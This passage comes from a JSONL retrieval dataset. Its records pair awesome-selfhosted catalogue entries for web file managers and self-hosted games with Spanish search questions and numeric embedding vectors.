0.00955, -0.05057, 0.02106, -0.03077, 0.0047, 0.00537, -0.02987, 0.02753, 0.01955, 0.01103, -0.00183, 0.00345, 0.05349, -0.00447, 0.00207, -0.04235, -0.04913, -0.00654, 0.03088, 0.01941, 0.02551, 0.00843, -0.03272, -0.02021, 0.05587, 0.02325, -0.0033, 0.00279, 0.03962, 0.01535, 0.01246, -0.06855, 0.02821, -0.03159, -0.01165, -0.04593, -0.04191, 0.00485, 0.01665, -0.01113, 0.03276, -0.00996, 0.03407]} +{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: FileRise β€” Web file manager with uploads, tagging, share links, gallery/table views, and an in-browser editor [MIT, Docker/PHP]. Filestash β€” Web file manager that lets you manage your data anywhere it is located: FTP, SFTP, WebDAV, Git, S3, Minio, Dropbox, or Google Drive [AGPL-3.0, Docker]. IFM β€” Single script file manager [MIT, PHP]. mikochi β€” Browse remote folders, upload files, delete, rename, download and stream files to VLC/mpv [MIT, Go/Docker/K8S]. miniserve β€” CLI tool to serve files and dirs over HTTP [MIT, Rust]. ResourceSpace β€” Simple, fast, and free way to organise your digital assets [BSD-4-Clause, PHP]. slcl β€” Simple and lightweight web cloud storage [AGPL-3.0, C]. Surfer β€” Simple static file server with webui to manage files [MIT, Nodejs]. TagSpaces β€” TagSpaces is an offline, cross-platform file manager and organiser that also can function as a note taking app. The WebDAV version of the application can be installed on top of a WebDAV servers such as Nextcloud or ownCloud [AGPL-3.0, Nodejs].", "indexar": "que herramienta sirve para gestionar archivos en la nube desde el navegador?", "v": [-0.02091, -0.09115, -0.13207, -0.27312, -0.03369, -0.09431, -0.1122, -0.022, -0.04662, -0.13399, -0.09378, -0.151, -0.00711, -0.01861, -0.08822, 0.07204, 0.09263, -0.12059, 0.01929, 0.08751, -0.05194, 0.07758, -0.01223, -0.00287, -0.11355, -0.07228, 0.03923, 0.03112, -0.14038, 0.02072, -0.11436, -0.05548, 0.07169, -0.07398, -0.0168, 0.04921, 0.02239, 0.03514, -0.12305, -0.00544, -0.05012, 0.03679, -0.111, 0.15071, -0.01238, -0.03262, 0.01523, -0.08347, 0.04078, 0.06268, -0.07821, -0.10574, -0.08494, 0.09431, -0.06914, -0.03868, 0.1011, -0.17148, 0.02891, -0.14184, -0.13146, 0.08116, -0.06085, -0.06262, -0.03969, -0.02759, 0.0281, 0.0161, -0.14415, 0.08109, 0.03183, 0.07917, 0.02126, 0.03444, -0.00696, 0.01353, 0.10031, 0.07129, -0.00597, 0.03245, 0.12023, 0.07695, -0.08975, -0.01755, -0.06676, -0.08484, 0.05668, -0.01584, 0.03252, -0.00774, -0.01851, 0.04978, 0.00845, -0.03834, 0.02005, 0.0176, 0.08967, -0.03264, -0.00765, -0.03961, 0.07428, 0.01549, -0.03414, 0.09131, 0.00431, 0.06953, 0.0525, -0.0366, -0.04805, 0.00065, 0.05693, -0.00423, 0.03122, 0.07994, 0.00158, 0.09822, 0.04465, -0.10477, -0.0638, -0.0516, -0.01391, -0.00056, -0.09273, -0.03436, 0.04978, 0.02456, -0.01034, 0.05661, -0.0635, -0.04966, -0.05131, -0.04589, -0.0331, 0.1201, -0.0476, 0.00335, -0.05972, -0.12082, -0.01548, -0.07253, 0.03677, 0.01512, -0.02941, 0.01199, 0.1222, -0.07016, 0.02537, -0.00054, 0.02821, -0.09211, 0.04652, -0.11202, -0.06996, -0.00448, -0.07837, 0.0714, -0.08835, -0.00425, -0.15219, 0.01288, 0.00633, -0.02394, -0.01205, 0.09148, 0.02839, -0.08452, 0.00158, 0.05871, 0.08032, 0.08021, 0.03724, 0.00167, 0.02993, -0.05306, 0.01798, 0.02263, 0.01129, -0.04976, 0.04214, -0.02015, 0.02654, -0.08509, -0.00661, 0.05551, -0.04129, -0.05611, 0.02217, 0.00698, -0.08477, 0.08039, -0.02241, 0.00772, -0.04117, -0.03719, 0.09216, -0.01737, -0.07892, -0.04977, -0.00148, 0.02002, -0.01249, 0.00414, -0.02805, -0.00439, -0.00965, 0.04118, 0.01678, -0.00766, 0.08004, -0.0201, -0.01623, 0.00629, -0.00967, -0.01447, 0.0525, -0.03425, 0.01999, 0.01339, 0.00307, -0.03819, -0.01622, -0.04876, 0.02057, -0.0355, 0.00415, 0.04424, -0.01801, 0.02247, -0.0406, -0.03879, 0.01476, -0.03222, 0.00275, 0.01052, -0.00227, -0.05225, 0.05363, -0.01004, -0.02731, -0.00963, -0.07794, 0.0365, 0.03138, 0.00216, -0.07844, -0.03923, -0.02091, -0.00657, 0.01341, 0.00087, -0.03731, 0.03867, 0.02207, 0.00909, -0.00817, 0.03964]} +{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: FileRise β€” Web file manager with uploads, tagging, share links, gallery/table views, and an in-browser editor [MIT, Docker/PHP]. Filestash β€” Web file manager that lets you manage your data anywhere it is located: FTP, SFTP, WebDAV, Git, S3, Minio, Dropbox, or Google Drive [AGPL-3.0, Docker]. IFM β€” Single script file manager [MIT, PHP]. mikochi β€” Browse remote folders, upload files, delete, rename, download and stream files to VLC/mpv [MIT, Go/Docker/K8S]. miniserve β€” CLI tool to serve files and dirs over HTTP [MIT, Rust]. ResourceSpace β€” Simple, fast, and free way to organise your digital assets [BSD-4-Clause, PHP]. slcl β€” Simple and lightweight web cloud storage [AGPL-3.0, C]. Surfer β€” Simple static file server with webui to manage files [MIT, Nodejs]. TagSpaces β€” TagSpaces is an offline, cross-platform file manager and organiser that also can function as a note taking app. The WebDAV version of the application can be installed on top of a WebDAV servers such as Nextcloud or ownCloud [AGPL-3.0, Nodejs].", "indexar": "con quΓ© puedo montar un gestor de archivos web que soporte diferentes servidores como SFTP o Google Drive?", "v": [-0.05228, -0.0567, -0.10629, -0.26142, -0.09629, -0.01916, 0.06638, -0.09808, -0.01374, -0.01858, -0.11163, 0.06838, 0.07996, -0.07639, 0.07167, 0.04678, 0.20136, -0.16365, 0.04224, -0.03019, 0.01482, 0.05786, 0.12877, -0.20539, 0.00512, -0.00402, 0.03334, -0.04594, -0.08479, -0.00579, 0.07558, -0.02198, -0.08582, -0.03499, -0.11764, 0.01208, -0.02397, 0.11018, -0.03962, -0.0173, 0.00026, -0.05346, -0.0787, 0.09534, -0.02542, -0.05146, 0.0864, -0.13451, 0.02671, -0.02243, -0.05941, -0.0886, -0.05547, 0.00705, -0.13688, 0.04623, 0.10775, -0.13796, 0.0378, 0.02219, -0.17448, 0.12668, -0.10177, 0.05621, 0.00021, 0.05257, 0.04682, 0.0793, -0.14705, -0.03072, -0.04179, 0.03114, 0.0367, 0.00303, 0.04891, 0.11431, 0.06626, 0.04022, 0.01094, 0.05325, 0.11222, 0.04337, -0.1049, 0.07666, -0.13332, -0.10401, -0.03144, -0.1119, -0.00182, -0.04644, -0.01882, 0.06102, -0.04088, 0.06873, -0.07436, -0.02621, 0.15057, -0.05649, -0.03143, -0.0143, 0.01294, 0.02993, 0.00463, 0.09427, 0.02622, 0.08994, 0.12999, -0.06909, 0.05714, -0.04255, 0.0004, 0.01895, -0.06593, -0.01104, -0.04421, -0.05007, 0.00685, -0.01225, 0.0207, -0.01171, -0.02393, 0.02845, 0.03483, 0.06393, 0.02482, 0.02259, 0.10316, 0.04302, -0.00983, -0.03034, 0.00791, 0.02505, -0.07766, 0.01195, -0.0506, 0.11281, 0.02424, 0.02324, -0.00798, -0.00403, 0.0563, -0.02152, 0.02474, -0.01463, 0.07913, -0.04362, 0.05541, -0.0606, -0.09605, -0.08819, -0.01235, 0.00649, -0.00817, -0.0194, -0.03423, 0.0163, -0.04729, -0.10285, -0.05716, 0.01202, -0.02618, 0.00253, -0.03855, 0.06595, -0.01904, 0.00927, -0.07674, 0.0334, 0.05721, 0.00481, -0.01992, 0.06655, 0.04359, -0.08722, 0.02278, -0.03755, -0.0441, -0.03256, 0.09804, 0.0091, -0.01775, 0.00308, 0.00566, 0.0839, -0.06711, -0.08489, -0.01097, 0.00979, 0.00171, 0.0447, 0.01364, 0.06299, -0.03339, -0.00275, 0.03487, -0.07167, -0.05697, -0.02307, 0.0292, -0.00276, 0.00212, -0.05316, -0.02905, -0.02735, -0.03235, -0.01679, 0.00796, 0.06522, 0.01834, 0.02314, 0.029, -0.04156, 0.06845, -0.03588, 0.04405, -0.00912, 0.02516, -0.00213, 0.00297, -0.02729, 0.02102, 0.00387, 0.04632, -0.00045, -0.02734, 0.04472, -0.00502, -0.05319, -0.01924, 0.0083, -0.00363, -0.01391, -0.03424, 0.00406, 0.03808, 0.02256, 0.01559, 0.00201, -0.03251, -0.011, 0.01308, 0.04353, -0.03912, -0.0139, -0.05657, -0.11165, -0.09933, 0.00359, -0.02124, -0.02042, 0.00048, -0.00821, -0.02986, -0.02628, -0.05061, -0.00693]} +{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: FileRise β€” Web file manager with uploads, tagging, share links, gallery/table views, and an in-browser editor [MIT, Docker/PHP]. Filestash β€” Web file manager that lets you manage your data anywhere it is located: FTP, SFTP, WebDAV, Git, S3, Minio, Dropbox, or Google Drive [AGPL-3.0, Docker]. IFM β€” Single script file manager [MIT, PHP]. mikochi β€” Browse remote folders, upload files, delete, rename, download and stream files to VLC/mpv [MIT, Go/Docker/K8S]. miniserve β€” CLI tool to serve files and dirs over HTTP [MIT, Rust]. ResourceSpace β€” Simple, fast, and free way to organise your digital assets [BSD-4-Clause, PHP]. slcl β€” Simple and lightweight web cloud storage [AGPL-3.0, C]. Surfer β€” Simple static file server with webui to manage files [MIT, Nodejs]. TagSpaces β€” TagSpaces is an offline, cross-platform file manager and organiser that also can function as a note taking app. The WebDAV version of the application can be installed on top of a WebDAV servers such as Nextcloud or ownCloud [AGPL-3.0, Nodejs].", "indexar": "existe alguna alternativa libre y ligera a los gestores de archivos tradicionales?", "v": [0.17393, -0.03492, -0.09056, -0.01082, -0.04429, 0.06665, 0.04836, -0.01281, -0.1611, -0.15281, 0.00914, -0.10143, 0.0813, 0.06143, 0.27874, -0.02708, 0.07972, -0.01886, 0.12336, -0.14568, -0.07809, 0.10707, -0.02981, -0.09086, -0.06146, -0.20943, 0.06391, -0.08751, -0.01784, 0.03447, -0.06105, 0.08569, 0.09205, -0.05012, -0.04342, 0.11071, 0.03872, 0.02365, -0.04621, -0.07884, 0.15199, -0.00213, 0.01622, 0.04639, -0.03543, -0.10588, -0.04928, 0.0061, -0.01282, 0.03454, -0.08519, 0.00135, -0.02228, 0.04914, 0.01796, 0.00621, 0.01839, -0.02273, -0.04169, -0.02178, -0.07516, 0.13664, 0.06955, -0.04106, 0.01155, 0.09946, 0.01457, -0.04063, -0.1001, 0.06713, 0.06995, 0.07792, 0.02806, 0.06538, -0.12189, 0.06547, 0.04789, 0.04401, -0.07606, 0.02495, 0.12382, -0.07181, 0.05709, -0.00991, -0.0731, -0.10186, 0.02393, -0.16168, -0.0293, -0.02946, 0.04464, -0.04725, 0.06119, 0.07232, -0.03771, -0.05946, -0.02421, 0.07155, -0.03326, 0.09965, 0.04619, 0.10352, -0.01193, 0.0492, 0.07252, 0.06786, 0.0757, 0.01151, 0.03707, 0.01254, 0.01163, 0.05448, 0.01837, 0.11161, -0.00296, 0.10203, -0.03805, -0.0103, -0.03158, 0.02816, -0.01507, -0.04068, 0.01819, 0.01206, 0.02296, -0.00642, 0.04217, 0.11499, -0.05451, 0.06148, 0.07685, -0.0069, -0.01693, -0.01143, -0.17157, 0.02231, 0.08364, 0.04801, 0.04611, 0.00633, 0.00057, 0.01308, -0.01745, -0.00384, 0.05415, -0.03865, 0.04198, -0.04103, -0.00869, -0.05572, -0.07163, -0.03612, -0.0377, 0.09538, -0.00777, 0.05373, -0.03742, -0.05017, -0.07368, 0.13469, 0.03281, -0.02013, -0.05028, -0.03274, -0.08572, -0.00045, 0.01103, -0.01145, -0.06515, 0.04266, 0.03776, 0.03386, 0.05577, -0.06367, 0.0363, 0.0289, -0.06221, -0.09459, 0.12583, -0.04617, 0.06355, 0.01152, -0.07371, 0.04707, 0.03369, -0.04918, -0.01958, 0.07148, -0.01942, 0.05405, 0.04737, 0.00256, -0.09116, -0.06802, -0.03603, 0.04509, 0.00857, -0.00762, -0.01508, -0.00402, -0.00901, -0.04044, -0.01989, -0.01516, -0.02849, 0.0237, -0.04167, 0.04656, 0.04315, 0.08483, -0.01366, 0.02239, 0.03973, -0.01162, -0.00641, -0.01017, -0.03573, -0.01085, 0.06203, -0.02836, 0.02365, -0.00033, 0.06859, 0.07306, 0.0282, 0.06652, -0.01831, 0.02109, -0.06659, -0.00393, 0.00014, -0.01775, 5e-05, 0.0659, 0.00109, -0.00731, -0.00631, 0.004, -0.01124, 0.00086, 0.01731, 0.02856, -0.01415, 0.03286, -0.03507, 0.00804, -0.05515, -0.05646, -0.02593, 0.00938, -0.00164, 0.03341, -0.00341, 0.04549, 0.01736, 0.02249]} +{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: Tiny File Manager β€” Web based File Manager in PHP, simple, fast and small file manager with a single file [GPL-3.0, PHP].", "indexar": "que programa web me sirve para gestionar archivos de forma sencilla", "v": [-0.00512, 0.01697, -0.10282, -0.30387, -0.02758, -0.13442, -0.06443, -0.0669, -0.05037, -0.0838, -0.04038, -0.14048, 0.06713, -0.10492, 0.06672, 0.02832, 0.17598, -0.15757, 0.07739, 0.04414, -0.02259, 0.06947, 0.03507, -0.08716, -0.07891, -0.05992, 0.09988, -0.00566, -0.06972, 0.02335, -0.02974, 0.01146, 0.03291, -0.08106, -0.00212, 0.13552, 0.01663, 0.05556, -0.05675, 0.03813, -0.07519, 0.01483, -0.01993, 0.11431, -0.00124, 0.0021, 0.15995, -0.11662, 0.02874, 0.03394, -0.02643, -0.07873, -0.02291, 0.07247, -0.02441, -0.03944, -0.07537, -0.25275, -0.05683, -0.0041, -0.06913, 0.07482, -0.02021, 0.01241, 0.00962, 0.05568, 0.08834, 0.06002, -0.11799, 0.06063, 0.022, 0.05008, 0.1062, -0.03838, -0.0187, -0.03695, 0.0378, -0.00456, -0.02678, -0.05359, 0.08136, -0.00378, -0.00496, 0.00978, -0.04182, 0.00509, -0.01845, 0.00135, -0.03388, -0.03478, 0.01523, -0.03274, -0.02536, -0.06604, 0.01383, -0.03808, 0.07773, 0.02468, -0.00559, -0.03889, -0.0363, -0.00864, -0.09604, 0.11067, -0.00759, 0.14705, 0.07085, 0.01495, -0.12046, -0.00624, 0.03952, 0.00648, -0.00816, 0.04951, -0.08788, 0.12796, 0.02061, -0.0008, 0.02439, -0.05943, -0.06083, 0.00825, -0.02956, 0.04559, 0.11079, 0.01748, 0.02723, 0.10702, -0.05628, 0.07009, -0.0118, -0.0091, -0.03425, 0.05549, -0.05824, -0.06549, 0.02518, 0.02138, -0.01242, -0.08561, 0.0108, 0.0984, -0.07122, 0.03177, 0.05786, -0.0757, 0.07524, -0.04927, 0.03262, -0.00646, 0.00344, -0.08371, -0.03031, -0.00501, -0.10212, -0.0207, -0.01567, -0.06134, -0.11266, 0.00267, -0.09401, 0.02262, -0.05975, 0.02944, 0.02968, -0.04452, -0.00073, 0.09102, 0.04437, 0.01742, 0.0327, 0.06978, 0.04405, -0.06347, 0.00846, 0.02985, -0.07358, -0.09802, 0.0591, 0.00177, -0.03845, 0.00359, 0.06738, 0.10529, -0.04976, -0.03174, -0.03193, 0.1033, -0.08622, -0.00107, 0.00664, 0.01538, -0.05694, -0.01586, 0.01844, 0.01977, -0.04725, 0.0201, 0.00741, -0.0295, -0.01962, -0.07709, 0.04034, 0.05767, -0.00514, 0.10802, -0.00591, -0.02367, 0.1036, 0.05229, -0.03149, 0.01237, 0.05979, -0.0167, 0.03042, -0.0611, 0.0136, 0.04721, 0.06153, 0.01678, -0.02681, -0.05474, 0.01538, 0.06505, 0.00994, -0.03483, -0.01263, -0.00854, -0.02748, -0.04168, -0.02461, -0.07678, 0.01477, 0.03717, -0.01659, -0.09217, -0.02963, -0.02385, -0.03283, -0.02275, -0.03197, 0.04079, 0.02649, 0.02257, -0.03226, -0.02081, -0.02743, 0.0048, -0.01864, 0.0508, -0.03032, -0.00852, -0.02776, 0.06294, 0.01216, 0.06735]} +{"tipo": "pregunta", "herramienta": "File Transfer - Web-based File Managers", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Web-based File Managers", "tema": "file transfer - web-based file managers", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Web-based File Managers: Tiny File Manager β€” Web based File Manager in PHP, simple, fast and small file manager with a single file [GPL-3.0, PHP].", "indexar": "con que puedo montar un gestor de archivos ligero basado en PHP", "v": [0.03889, -0.04805, -0.12172, -0.17991, -0.1434, 0.03316, 0.05723, 0.02541, -0.20428, -0.19937, -0.00848, 0.12447, 0.06941, -0.01083, 0.11909, 0.04398, -0.03501, -0.06158, 0.02744, -0.04647, -0.05043, 0.08531, 0.04613, -0.16227, -0.01854, -0.00936, 0.06527, -0.04126, -0.12502, -0.00346, 0.02389, 0.10598, -0.00867, 0.06156, -0.05579, 0.02675, 0.02101, 0.04569, -0.10432, 0.06648, -0.00203, 0.08521, -0.03024, 0.0596, -0.03297, -0.07575, 0.09626, -0.15044, 0.11026, -0.00203, 0.08097, -0.05531, -0.0866, 0.06319, -0.05175, 0.03124, 0.02987, -0.11237, 0.10885, 0.02689, -0.08726, 0.06218, -0.00825, 0.02972, -0.02957, 0.13668, 0.04082, 0.06839, -0.0909, 0.05426, -0.0317, 0.05704, -0.07358, 0.08537, -0.01761, 0.08644, 0.07819, -0.0118, -0.0325, -0.00927, 0.03609, -0.05696, 0.02902, 0.05938, -0.13588, -0.13937, 0.00794, -0.11546, 0.05383, 0.02188, 0.12004, 0.01649, 0.00432, -0.01057, -0.12868, -0.04163, 0.08458, 0.02831, -0.06903, -0.05375, -0.09814, 0.04405, 0.07073, 0.14472, 0.17126, 0.11019, 0.13799, 0.0877, 0.01061, -0.10306, 0.05971, 0.01572, -0.01541, 0.05967, -0.06791, 0.0185, 0.08019, 0.03298, -0.04235, -0.06508, 0.01262, 0.00999, -0.00141, 0.04841, 0.12894, 0.00012, 0.12705, 0.08185, -0.03909, 0.03541, 0.01469, -0.0055, -0.06429, 0.0169, -0.07163, 0.11789, 0.05228, 0.07677, -0.01278, 0.01288, -0.04189, -0.02793, 0.01496, 0.02431, 0.09121, -0.01956, 0.02653, -0.04179, -0.02423, -0.01787, 0.05444, 0.00293, 0.04265, -0.02146, -0.1177, -0.03362, 0.05882, -0.04096, -0.02963, 0.05322, 0.01628, 0.04449, 0.00388, 0.01427, -0.03333, -0.05985, -0.05847, -0.01208, 0.05713, -0.01172, 0.00409, 0.06012, 0.02198, -0.00785, 0.05638, 0.02758, -0.05863, -0.06984, 0.0132, 0.01355, 0.05927, 0.00312, -0.0083, 0.07655, -0.02996, -0.00159, 0.03702, 0.08856, -0.02054, 0.02241, 0.02206, 0.0306, -0.01036, 0.03236, 0.02121, -0.01666, -0.01665, 0.01576, 0.01417, 0.00477, 0.00433, -0.02, -0.00085, 0.00969, 0.01061, -0.05168, 0.01617, 0.08544, 0.03615, 0.01745, -0.00976, -0.00824, 0.05661, 0.02035, 0.06179, -0.01688, -0.01753, 0.00722, 0.04207, 0.00333, -0.04027, 0.02461, 0.09424, -0.02548, -0.00384, 0.0088, -0.05974, -0.03773, -0.01634, 0.02807, -0.05716, -0.02254, -0.01627, -0.00701, 0.02453, 0.03293, 0.0129, -0.00049, -0.07233, 0.01099, 0.0625, 0.08893, 0.02109, -0.01382, -0.01878, -0.045, 0.01375, 0.01899, 0.00892, -0.02627, -0.0264, -0.00888, -0.03376, -0.01479, -0.04769, 0.00725]} +{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: 0 A.D. β€” Cross-platform real-time strategy game of ancient warfare [MIT/GPL-2.0/Zlib, C++/C/deb]. A Dark Room β€” Minimalist text adventure game for your browser [MPL-2.0, Javascript]. DDraceNetwork β€” Cooperative platformer version of DDRace, a Teeworlds modification featuring unique cooperative gameplay [Zlib, C++]. Digibuzzer β€” Create a virtual game room around a connected buzzer (documentation in French) [AGPL-3.0, Nodejs]. Hypersomnia β€” Competitive top-down shooter blending Counter-Strike with Hotline Miami. Runs on Linux, Windows, MacOS and the Web [AGPL-3.0, C++/Docker]. Lila β€” Ad-less chess server powering lichess.org, with official iOS and Android client apps [AGPL-3.0, Scala]. Luanti β€” Voxel game engine (formerly Minetest). Play one of our many games, mod a game to your liking, make your own game, or play on a multiplayer server [LGPL-2.1/MIT/Zlib, C++/Lua/deb]. Mindustry β€” Factorio-like tower defense game. Build production chains to gather more resources, and build complex facilities [GPL-3.0, Java].", "indexar": "que programa hay para jugar juegos de estrategia en tiempo real como A.D.", "v": [-0.08533, 0.07445, -0.03791, -0.13389, -0.01607, -0.0296, -0.07072, -0.00181, 0.03046, -0.03364, 0.08219, -0.07007, -0.11729, -0.03731, 0.07916, -0.06155, 0.14399, 0.04969, 0.02636, -0.02733, 0.01036, -0.05448, -0.08202, -0.09809, 0.03863, 0.01112, 0.11747, 0.04854, -0.1272, 0.04852, -0.08303, 0.02098, 0.18937, -0.19473, 0.0368, -0.09044, 0.10896, 0.05969, 0.0599, 0.02727, -0.01136, 0.05273, -0.0672, -0.08683, 0.09202, 0.08182, 0.0855, -0.04138, -0.04434, -0.07583, 0.03631, 0.10409, 0.04911, -0.08725, 0.1187, -0.05519, -0.02713, -0.10918, -0.11181, -0.08225, -0.12444, -0.06306, 0.01096, -0.04697, 0.0248, 0.05912, 0.00395, 0.05475, -0.01658, 0.06755, -0.00329, -0.01718, 0.02106, 0.03226, -0.06278, -0.01396, 0.03329, -0.03062, -0.03635, -0.03653, 0.04831, -0.15956, -0.09031, 0.17018, -0.06075, -0.00378, 0.05141, -0.0451, -0.01216, -0.05168, -0.01045, 0.00363, -0.08667, 0.06187, -0.00721, -0.14052, 0.0843, -0.05122, 0.06792, 0.03911, 0.0021, -0.02505, -0.14126, 0.06342, -0.09549, 0.02854, 0.04417, -0.03582, -0.07257, -0.01887, -0.04857, -0.01013, -0.08313, 0.0671, 0.09946, 0.06573, -0.01309, -0.00229, 0.08369, 0.02605, -0.15846, 0.06774, 0.02097, -0.01777, 0.01432, -0.01639, -0.09512, -0.01553, -0.06368, -0.03505, -0.02978, 0.00284, -0.05118, 0.05, -0.09489, -0.05624, 0.03891, 0.07907, -0.07962, 0.0378, -0.01243, 0.08885, 0.01663, -0.03576, 0.03341, 0.04213, 0.09588, -0.06682, -0.01945, 0.02407, 0.08081, 0.04918, 0.04833, 0.0166, 0.00276, 0.02313, 0.03849, 0.06482, -0.13539, 0.07974, -0.00227, 0.02128, -0.05326, -0.03867, 0.06822, -0.02949, 0.06535, 0.03375, 0.06097, 0.00077, -0.05469, 0.00218, 0.06668, -0.08092, -0.06058, 0.0384, -0.02138, -0.02303, -0.05099, -0.09821, 0.01334, -0.05053, 0.08594, 0.05842, -0.05274, -0.11034, -0.00477, 0.00092, 0.04485, -0.02263, -0.02259, -0.0284, -0.02883, 0.12831, -0.00053, -0.03409, 0.07844, 0.03282, 0.01616, -0.02244, 0.00328, -0.02332, 0.05082, 0.01902, -0.02795, 0.1252, 0.01744, 0.00053, -0.03082, 0.07005, 0.06215, -0.01772, -0.01134, 0.03415, 0.02453, -0.08503, 0.00604, -0.02359, 0.06809, 0.04819, -0.00998, 0.00056, 0.02399, -0.02718, -0.06899, -0.047, 0.03889, 0.08026, 0.00979, -0.02529, 0.02476, 0.01753, -0.00437, 0.04409, -0.0128, -0.01549, 0.07189, -0.02953, -0.03063, -0.05366, 0.01567, -0.04884, -0.00077, -0.03879, -0.00586, -0.05994, -0.0336, -0.09663, 0.00787, -0.045, -0.09192, -0.01896, -0.01944, -0.00356, 0.01472, 0.02348]} +{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: 0 A.D. β€” Cross-platform real-time strategy game of ancient warfare [MIT/GPL-2.0/Zlib, C++/C/deb]. A Dark Room β€” Minimalist text adventure game for your browser [MPL-2.0, Javascript]. DDraceNetwork β€” Cooperative platformer version of DDRace, a Teeworlds modification featuring unique cooperative gameplay [Zlib, C++]. Digibuzzer β€” Create a virtual game room around a connected buzzer (documentation in French) [AGPL-3.0, Nodejs]. Hypersomnia β€” Competitive top-down shooter blending Counter-Strike with Hotline Miami. Runs on Linux, Windows, MacOS and the Web [AGPL-3.0, C++/Docker]. Lila β€” Ad-less chess server powering lichess.org, with official iOS and Android client apps [AGPL-3.0, Scala]. Luanti β€” Voxel game engine (formerly Minetest). Play one of our many games, mod a game to your liking, make your own game, or play on a multiplayer server [LGPL-2.1/MIT/Zlib, C++/Lua/deb]. Mindustry β€” Factorio-like tower defense game. Build production chains to gather more resources, and build complex facilities [GPL-3.0, Java].", "indexar": "con que puedo montar un servidor de ajedrez sin anuncios como Lila", "v": [0.16435, -0.01829, -0.1606, -0.05321, -0.05899, 0.03198, 0.00478, -0.02689, -0.18533, -0.06805, 0.00659, -0.07994, 0.02229, -0.09523, 0.18413, 0.10289, 0.15975, -0.07837, 0.07008, 0.06476, 0.09356, 0.02663, 0.01099, -0.04502, 0.05035, 0.05065, 0.18759, -0.05612, -0.09194, -0.05078, -0.15757, 0.07853, 0.06503, 0.09128, 0.08421, -0.02416, 0.06159, 0.12661, -0.07641, 0.01205, 0.1029, 0.02683, -0.03184, -0.02006, -0.12684, -0.00753, 0.06924, -0.06211, -0.01288, -0.04468, 0.05974, -0.04563, -0.08651, -0.01078, 0.04083, 0.01574, 0.07055, -0.07429, 0.04142, -0.06085, -0.06651, 0.05446, -0.05004, 0.06549, 0.05689, 0.05401, 0.01439, 0.03829, -0.02366, -0.14298, 0.00022, -0.08626, -0.03506, -0.09593, -0.02804, 0.09777, 0.01022, -0.00226, 0.07662, 0.06077, 0.03934, -0.08627, 0.03358, 0.16632, -0.064, -0.01949, -0.05116, -0.11983, 0.02455, 0.02332, 0.08338, 0.14367, -0.03098, 0.1194, 0.00024, -0.07758, 0.08889, 0.03844, -0.00522, -0.07419, 0.01803, 0.0245, -0.06673, 0.04406, -0.00036, 0.05082, 0.10291, -0.10967, 0.07193, -0.03282, 0.04737, -0.01114, -0.05331, 0.03927, -0.0644, -0.07961, 0.01484, 0.04964, 0.01211, 0.04488, -0.00358, -0.05524, 0.06542, 0.05131, -0.01103, -0.08211, 0.03252, 0.05178, -0.02422, 0.01851, -0.00224, 0.04005, -0.04532, -0.03269, 0.01914, 0.00825, 0.0253, -0.00128, -0.0747, 0.01968, 0.11301, -0.04025, -0.03339, -0.12212, 0.06193, 0.07558, 0.14949, -0.09125, -0.0519, 0.03329, 0.0362, 0.02881, 0.03929, 0.01927, -0.04841, -0.06995, 0.04012, -0.03335, -0.02258, 0.07341, 0.00139, 0.10402, 0.02682, 0.11674, 0.04379, 0.03954, -0.04348, 0.06543, 0.03616, 0.0304, -0.11417, 0.03862, -0.00163, -0.01125, 0.0842, -0.01639, -0.11989, 0.02067, -0.0153, -0.02839, -0.02603, -0.02522, -0.08179, 0.02619, -0.10952, -0.03483, 0.00878, -0.01643, -0.00488, 0.0048, 0.01156, 0.02893, -0.07397, 0.04194, 0.08086, -0.05178, -0.03809, -0.02085, -0.07383, -0.03885, 0.01319, -0.02749, -0.01537, 0.00146, 0.02069, 0.00947, -0.01361, 0.08819, 0.02995, 0.03895, 0.03242, -0.0925, 0.04933, -0.05354, -0.03664, -0.00717, 0.0574, -0.05289, 0.02053, 0.01239, -0.00362, 0.02219, 0.01914, -0.02965, -0.00785, 0.00463, 0.01604, 0.0201, 0.06839, 0.04149, -0.06738, 0.00831, -0.0461, 0.03085, 0.03822, 0.00834, 0.01708, -0.04451, -0.02126, -0.01205, -0.02499, -0.01009, -0.03289, -0.04727, -0.006, -0.05179, -0.00729, 0.00958, -0.03901, -0.00795, -0.00189, 0.01671, 0.01252, -0.04879, -0.00028, -0.01922]} +{"tipo": "pregunta", "herramienta": "Games", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Games", "tema": "games", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Games: 0 A.D. β€” Cross-platform real-time strategy game of ancient warfare [MIT/GPL-2.0/Zlib, C++/C/deb]. A Dark 